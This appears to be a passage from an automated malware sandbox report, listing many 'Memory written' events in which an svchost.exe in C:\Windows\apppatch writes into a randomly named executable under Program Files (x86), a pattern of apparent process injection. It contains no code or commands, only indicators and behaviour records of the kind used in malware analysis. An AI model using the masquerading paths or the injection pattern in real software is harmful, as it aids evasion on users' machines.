Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 1090000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 1091000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 1092000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 10E5000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: D60000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: D61000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: D62000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: DB5000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 15E0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 15E1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 15E2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 1635000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 1390000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 1391000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 1392000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 13E5000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 11C0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 11C1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 11C2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 1215000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 6D0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 6D1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 6D2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 725000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 870000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 871000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 872000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 8C5000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: EA0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: EA1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: EA2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: EF5000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 1300000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 1301000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 1302000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 1355000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: C60000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: C61000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: C62000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: CB5000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 600000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 601000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 602000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 655000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 1590000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 1591000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 1592000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 15E5000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: B90000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: B91000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: B92000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: BE5000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: BE0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: BE1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: BE2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: C35000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: B10000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: B11000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: B12000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: B65000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: F90000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: F91000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: F92000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: FE5000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: CF0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: CF1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: CF2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: D45000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 1450000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 1451000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 1452000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 14A5000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: D20000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: D21000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: D22000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: D75000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: A10000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: A11000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: A12000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: A65000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: FF0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: FF1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: FF2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 1045000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: EF0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: EF1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: EF2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: F45000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: A80000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: A81000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: A82000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: AD5000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: DC0000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: DC1000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: DC2000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: E15000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: C50000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: C51000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: C52000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: CA5000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: D50000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: D51000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: D52000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: DA5000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: F70000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: F71000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: F72000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: FC5000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 1270000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 1271000Jump to behavior
